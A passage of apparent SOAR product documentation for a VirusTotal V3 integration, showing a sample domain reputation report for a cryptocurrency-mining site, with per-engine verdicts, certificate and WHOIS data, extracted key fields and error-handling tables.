"method": "blacklist",
"engine_name": "benkow.cc"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"CRDF": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CRDF"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "suspicious",
"result": "suspicious",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "malicious",
"result": "malware",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"last_update_date": 1614432818,
"last_modification_date": 1632337430,
"last_https_certificate": {
"public_key": {
"rsa": {
"key_size": 2048,
"modulus": "*****",
"exponent": "010001"
},
"algorithm": "RSA"
},
"thumbprint_sha256": "*****",
"tags": [],
"signature_algorithm": "sha256RSA",
"subject": {
"OU": "PositiveSSL Wildcard",
"CN": "*.minergate.com"
},
"validity": {
"not_after": "2020-09-27 23:59:59",
"not_before": "2019-09-25 00:00:00"
},
"version": "V3",
"extensions": {
"certificate_policies": [
"1.3.6.1.4.1.6449.1.2.2.7",
"2.23.140.1.2.1"
],
"extended_key_usage": [
"serverAuth",
"clientAuth"
],
"tags": [],
"subject_alternative_name": [
"*.minergate.com",
"minergate.com"
],
"authority_key_identifier": {
"keyid": "*****"
},
"ca_information_access": {
"CA Issuers": "http://crt.sectigo.com/*****",
"OCSP": "http://ocsp.sectigo.com"
},
"subject_key_identifier": "*****",
"key_usage": [
"ff"
],
"1.3.6.1.4.1.11129.2.4.2": "*****",
"CA": true
},
"cert_signature": {
"signature_algorithm": "sha256RSA",
"signature": "*****"
},
"serial_number": "*****",
"thumbprint": "*****",
"issuer": {
"CN": "Sectigo RSA Domain Validation Secure Server CA",
"C": "GB",
"L": "Salford",
"O": "Sectigo Limited",
"ST": "Greater Manchester"
},
"size": 1538
},
"categories": {
"Sophos": "stocks and trading",
"BitDefender": "financial",
"Webroot": "Malware Sites",
"Comodo Valkyrie Verdict": "media sharing",
"Forcepoint ThreatSeeker": "potentially unwanted software",
"alphaMountain.ai": "Malicious"
},
"total_votes": {
"harmless": 0,
"malicious": 1
}
},
"type": "domain",
"id": "*****.*****.***",
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***"
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"types": [
"domain"
],
"IndicatorIDs": [
"*****.*****.***"
],
"Reputations": [
-1
],
"Registrars": [
"GoDaddy.com, LLC"
],
"LastModificationDateTimestamps": [
1632337430
],
"HarmlessCounts": [
66
],
"MaliciousCounts": [
9
],
"SuspiciousCounts": [
1
],
"UndetectedCounts": [
10
],
"TypeDescriptions": [
"Win32 EXE"
],
"titles": [
"MinerGate - Cryptocurrency mining pool & easiest GUI miner"
],
"LastAnalysisDateTimestamps": [
1632337344
],
"Texts": [
"#PHISHING ( #FACEBOOK ) - #Faceliker? ?"
]
}Indicates one of the possible command execution states: Successful or Failed.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
ATTRIBUTES | TYPE | ID | LINKS |
|---|---|---|---|
{'last_dns_records': [{'type': 'A', 'value': '***.***.***.***', 'ttl': 30}, {'type': 'A', 'value': '***.***.***.***', 'ttl': 30}, {'type': 'CNAME', 'value': '*****.*****.***', 'ttl': 30}, {'type': 'A', 'value': '***.***.***.***', 'ttl': 30}, {'type': 'CNAME', 'value': '*****.*****.***', 'ttl': 18}], 'jarm': '*****', 'whois': 'Admin City: Tempe\nAdmin Country: US\nAdmin Email: *****@*****.***\nAdmin Organization: Domains By Proxy, LLC\nAdmin Postal Code: *****\nAdmin State/Province: Arizona\nCreation Date: 2014-03-04T06:56:24Z\nCreation Date: 2014-03-04T11:56:24Z\nDNSSEC: unsigned\nDomain Name: MINERGATE.COM\nDomain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited\nDomain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited\nDomain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited\nDomain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited\nDomain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited\nDomain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\nDomain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited\nDomain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited\nName Server: NS-1476.AWSDNS-56.ORG\nName Server: NS-1810.AWSDNS-34.CO.UK\nName Server: NS-822.AWSDNS-38.NET\nName Server: NS-97.AWSDNS-12.COM\nRegistrant City: *****\nRegistrant Country: US\nRegistrant Email: *****@*****.***\nRegistrant Fax Ext: *****\nRegistrant Fax: *****\nRegistrant Name: *****\nRegistrant Organization: *****\nRegistrant Phone Ext: *****\nRegistrant Phone: *****\nRegistrant Postal Code: *****\nRegistrant State/Province: *****\nRegistrant Street: *****\nRegistrant Street: *****\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: *****\nRegistrar Abuse Contact Phone: *****\nRegistrar IANA ID: 146\nRegistrar Registration Expiration Date: 2022-03-04T06:56:24Z\nRegistrar URL: http://www.godaddy.com \nRegistrar WHOIS Server: whois.godaddy.com\nRegistrar: http://GoDaddy.com , LLC\nRegistry Admin ID: Not Available From Registry\nRegistry Domain ID: *****-VRSN\nRegistry Expiry Date: 2022-03-04T11:56:24Z\nRegistry Registrant ID: Not Available From Registry\nRegistry Tech ID: Not Available From Registry\nTech City: Tempe\nTech Country: US\nTech Email: *****@*****.***\nTech Organization: Domains By Proxy, LLC\nTech Postal Code: *****\nTech State/Province: Arizona\nUpdated Date: 2021-02-27T06:33:38Z\nUpdated Date: 2021-02-27T13:33:38Z', 'last_https_certificate_date': 1589470203, 'tags': [], 'popularity_ranks': {'Cisco Umbrella': {'timestamp': 1632324968, 'rank': 382288}}, 'last_dns_records_date': 1632322529, 'last_analysis_stats': {'harmless': 66, 'malicious': 9, 'suspicious': 1, 'undetected': 10, 'timeout': 0}, 'creation_date': 1393934184, 'reputation': -1, 'registrar': 'http://GoDaddy.com , LLC', 'last_analysis_results': {'CMC Threat Intelligence': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CMC Threat Intelligence'}, 'DNS8': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'DNS8'}, 'Lionic': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Lionic'}, 'Snort IP sample list': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Snort IP sample list'}, 'AICC (MONITORAPP)': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AICC (MONITORAPP)'}, 'http://benkow.cc ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://benkow.cc '}, '0xSI_f33d': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': '0xSI_f33d'}, 'securolytics': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'securolytics'}, 'MalwarePatrol': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwarePatrol'}, 'Armis': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Armis'}, 'MalBeacon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalBeacon'}, 'Comodo Valkyrie Verdict': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Comodo Valkyrie Verdict'}, 'PhishLabs': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'PhishLabs'}, 'EmergingThreats': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EmergingThreats'}, 'zvelo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'zvelo'}, 'CRDF': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'CRDF'}, 'K7AntiVirus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'K7AntiVirus'}, 'Nucleon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Nucleon'}, 'Virusdie External Site Scan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Virusdie External Site Scan'}, 'CINS Army': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CINS Army'}, 'Spamhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spamhaus'}, 'Quttera': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quttera'}, 'Yandex Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Yandex Safebrowsing'}, 'SafeToOpen': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'SafeToOpen'}, 'MalwareDomainList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwareDomainList'}, 'CyberCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyberCrime'}, 'Lumu': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Lumu'}, 'Google Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Google Safebrowsing'}, 'FraudScore': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'FraudScore'}, 'Kaspersky': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Kaspersky'}, 'BitDefender': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BitDefender'}, 'Emsisoft': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Emsisoft'}, 'GreenSnow': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'GreenSnow'}, 'G-Data': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'G-Data'}, 'Segasec': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Segasec'}, 'OpenPhish': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'OpenPhish'}, 'Sucuri SiteCheck': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sucuri SiteCheck'}, 'VX Vault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'VX Vault'}, 'Trustwave': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Trustwave'}, 'Web Security Guard': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Web Security Guard'}, 'CyRadar': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyRadar'}, 'http://desenmascara.me ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://desenmascara.me '}, 'ADMINUSLabs': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'ADMINUSLabs'}, 'Scantitan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Scantitan'}, 'IPsum': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'IPsum'}, 'Dr.Web': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Dr.Web'}, 'AlienVault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AlienVault'}, 'Sophos': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sophos'}, 'http://malwares.com URL checker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://malwares.com URL checker'}, 'Abusix': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Abusix'}, 'Phishtank': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishtank'}, 'EonScope': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EonScope'}, 'Malwared': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malwared'}, 'Avira': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Avira'}, 'NotMining': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'NotMining'}, 'Cyan': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Cyan'}, 'Antiy-AVL': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'Antiy-AVL'}, 'http://SCUMWARE.org ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://SCUMWARE.org '}, 'Spam404': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spam404'}, 'MalSilo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalSilo'}, 'ESTsecurity-Threat Inside': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'ESTsecurity-Threat Inside'}, 'Certego': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Certego'}, 'ESET': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESET'}, 'Threatsourcing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Threatsourcing'}, 'URLhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'URLhaus'}, 'SecureBrain': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'SecureBrain'}, 'Webroot': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'Webroot'}, 'PREBYTES': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PREBYTES'}, 'StopForumSpam': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'StopForumSpam'}, 'Blueliv': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Blueliv'}, 'Hoplite Industries': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Hoplite Industries'}, 'Netcraft': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Netcraft'}, 'AutoShun': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'AutoShun'}, 'ThreatHive': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ThreatHive'}, 'http://BADWARE.INFO ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://BADWARE.INFO '}, 'Forcepoint ThreatSeeker': {'category': 'suspicious', 'result': 'suspicious', 'method': 'blacklist', 'engine_name': 'Forcepoint ThreatSeeker'}, 'Quick Heal': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quick Heal'}, 'Tencent': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Tencent'}, 'StopBadware': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'StopBadware'}, 'Fortinet': {'category': 'malicious', 'result': 'malware', 'method': 'blacklist', 'engine_name': 'Fortinet'}, 'http://Bfore.Ai PreCrime': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'http://Bfore.Ai PreCrime'}, 'ZeroCERT': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ZeroCERT'}, 'Baidu-International': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Baidu-International'}, 'Phishing Database': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishing Database'}, 'http://alphaMountain.ai ': {'category': 'malicious', 'result': 'malicious', 'method': 'blacklist', 'engine_name': 'http://alphaMountain.ai '}}, 'last_update_date': 1614432818, 'last_modification_date': 1632337430, 'last_https_certificate': {'public_key': {'rsa': {'key_size': 2048, 'modulus': '*****', 'exponent': '010001'}, 'algorithm': 'RSA'}, 'thumbprint_sha256': '*****', 'tags': [], 'signature_algorithm': 'sha256RSA', 'subject': {'OU': 'PositiveSSL Wildcard', 'CN': '*.minergate.com'}, 'validity': {'not_after': '2020-09-27 23:59:59', 'not_before': '2019-09-25 00:00:00'}, 'version': 'V3', 'extensions': {'certificate_policies': ['1.3.6.1.4.1.6449.1.2.2.7', '2.23.140.1.2.1'], 'extended_key_usage': ['serverAuth', 'clientAuth'], 'tags': [], 'subject_alternative_name': ['*.minergate.com', 'http://minergate.com '], 'authority_key_identifier': {'keyid': '*****'}, 'ca_information_access': {'CA Issuers': 'http://crt.sectigo.com/*****', 'OCSP': 'http://ocsp.sectigo.com'}, 'subject_key_identifier': '*****', 'key_usage': ['ff'], '1.3.6.1.4.1.11129.2.4.2': '*****', 'CA': True}, 'cert_signature': {'signature_algorithm': 'sha256RSA', 'signature': '*****'}, 'serial_number': '*****', 'thumbprint': '*****', 'issuer': {'CN': 'Sectigo RSA Domain Validation Secure Server CA', 'C': 'GB', 'L': 'Salford', 'O': 'Sectigo Limited', 'ST': 'Greater Manchester'}, 'size': 1538}, 'categories': {'Sophos': 'stocks and trading', 'BitDefender': 'financial', 'Webroot': 'Malware Sites', 'Comodo Valkyrie Verdict': 'media sharing', 'Forcepoint ThreatSeeker': 'potentially unwanted software', 'http://alphaMountain.ai ': 'Malicious'}, 'total_votes': {'harmless': 0, 'malicious': 1}} | domain | *****.*****.*** | {'self': 'https://www.virustotal.com/api/v3/domains/*****.*****.***' |
Error Handling
If the Return Data is Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Search failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Not Found. |
Error Sample Data Search failed. Status Code: 404. Message: Not Found. |
Test Connection
Allows you to perform a health check on an integration connection. You can schedule a periodic health check by selecting Connection Health Check when editing an integration connection.
Input
N/A
Output
Indicates one of the possible command execution states: Successful or Failed.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulError Handling
If the Return Data is failed, an Error tab will appear in the Test Result window.
The error tab contains the responses from the third-party API calls including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Test Connection failed. Failed to check the connector. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 403. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Expecting value: line 1 column 1. |
Error Sample Data Test Connection failed. Failed to check the connector. Status Code: 403. Message: Expecting value: line 1 column 1. |